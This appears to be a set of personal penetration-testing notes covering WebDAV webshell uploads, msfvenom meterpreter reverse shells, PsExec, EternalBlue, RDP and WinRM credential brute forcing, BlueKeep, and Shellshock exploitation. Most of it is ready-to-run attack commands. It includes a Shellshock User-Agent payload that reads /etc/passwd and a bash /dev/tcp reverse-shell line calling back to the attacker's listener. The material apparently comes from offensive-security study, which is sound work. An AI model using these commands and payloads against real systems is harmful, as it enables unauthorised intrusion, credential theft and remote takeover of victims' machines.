-Microsoft IIS + WebDAV: (port 80/443)
Can execute .asp .aspx .config & .php files
davtest (used for scan, authenticate & exploit a WebDAV server)
davtest -url http://IPobj/webdav (without creds)
davtest -auth user:pass -url http://IPobj/webdav (this tells you the types of files we can upload and execute)
cadaver (upload files;download;screen display;edit;move;copy;create & erase collections;change the owener & block resources in WebDAV servers)
cadaver –help
cadaver http://IPobj/webdav (and input the credentials)
in other terminal: ls -al /usr/share/webshells (asp in this case)
after in cadaver: put /usr/share/webshells/asp/webshell.asp (config the shell if neccesary)
Come back again to the web page and try to execute the web shell typing the directory.
Method 1:
msfvenom -p /windows/meterpreter/reverse_tcp LHOST=IPkali LPORT=x -f asp > shell.asp (reverse shell payload in asp)
after: cadaver http://IPobj/webdav input credentials and upload the revshell with the put command
Open metasploit: service postgresql start && msfconsole -> use multi/handler -> set payload windows/meterpreter/reverse_tcp (config exactly as the payload that we created with msfvenom), run it go to the web page, execute the payload uploaded and we got a reverse shell.
Method 2:
search iis upload -> use 1 -> show options & config it -> set path /webdav/metasploit.asp -> exploit
To use PsExec we need credentials (user & pass) or a hash if we haven't the pass.
use: psexec.py user@IPobj cmd.exe
Para meterpreter:
search psexec -> use 10 (exploit/windows/smb/psexec) -> configurate and run.
-ETERNALBLUE (Metasploit or python script from searchsploit). MS17-010 & CVE-2017-0144
Eternalblue is easy bruh.
-EXPLOITING RDP: (normally 3389 TCP)
Requires an account of the victim PC (username & password)
metasploit rdp_scanner (to see the version of RDP)
then bruteforce (with hydra for example) if we get an account with privileges is better.
xfreerdp /u:user /p:password /v:IPobj:RDPport (to connect via RDP to the victim machine)
-BLUEKEEP: CVE-2019-0708:
METASPLOIT: search bluekeep (use the auxiliar module to see if it's vulnerable)
then search bluekeep -> use 1 (only works for x64 bits targets) -> show options (config as needed) -> show targets (choose the right one)
-EXPLOITING WinRM: (5985 TCP y 5986 HTTPS)
Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Remote administration protocol for Windows hosts.
crackmapexec to see the help panel
crackmapexec WinRM IPobj -u administrator -p /wordlistpass (to get credentials of a privileged user, Administrator always exists on windows)
crackmapexec winrm IPobj -u administrator -p pass -x “whoami” (to try RCE)
evil-winrm(.rb) -u administrator -p ‘passadmin’ -i IPobj (to obtain a shell of the victim)
search winr_script_exec -> use 0 -> show options (y configurar) -> set force_vbs true -> set username y password -> exploit (it may not work, try a few times)
-SHELLSHOCK: (CVE-2014-6271)
The shellshock vulenrability happens because a vulnerability in bash (old versions), bash executes commands after this instruction: (){:;};
Apache webservers configured to run cgi scripts or sh scripts may be vulnerable to this (those scripts are in /cgi-bin/ directory)
To exploit this vulnerability you have to find a script that is running through bash.
In the context of an apache webserver we could use any .cgi script stored in there.
We connect to the web page through the web explorer.
In the source code we see this:
In <script> we see that executes a .cgi file, access to the script through the URL.
Check if it's vulnerable con: nmap -sV IPobj –script=http-shellshock –script-args “http-shellshock.uri=/script.cgi”
With burpsuite intercept the page IPobj/script.cgi -> right click -> send to repeater -> change the user-agent for: (){:;}; echo; echo; /bin/bash -c ‘cat /etc/passwd’ -> send , in response we get the output of the command executed. THIS IS A RCE SO YOU CAN USE /usr/bin/whoami for example.
nc -nlvp port (on local machine)
Go back to burpsuite repeater and in user-agent put this: (){:;}; echo; echo; /bin/bash -c ‘bash -i&/dev/tcp/IPkali/LPORTnetcat 0>&1’and we obtain the reverse shell.
search shellshock -> use 5 (exploit/multi/http/apache_mod_cgi_bash_env_exec) -> show options -> set targeturi script.cgi -> exploit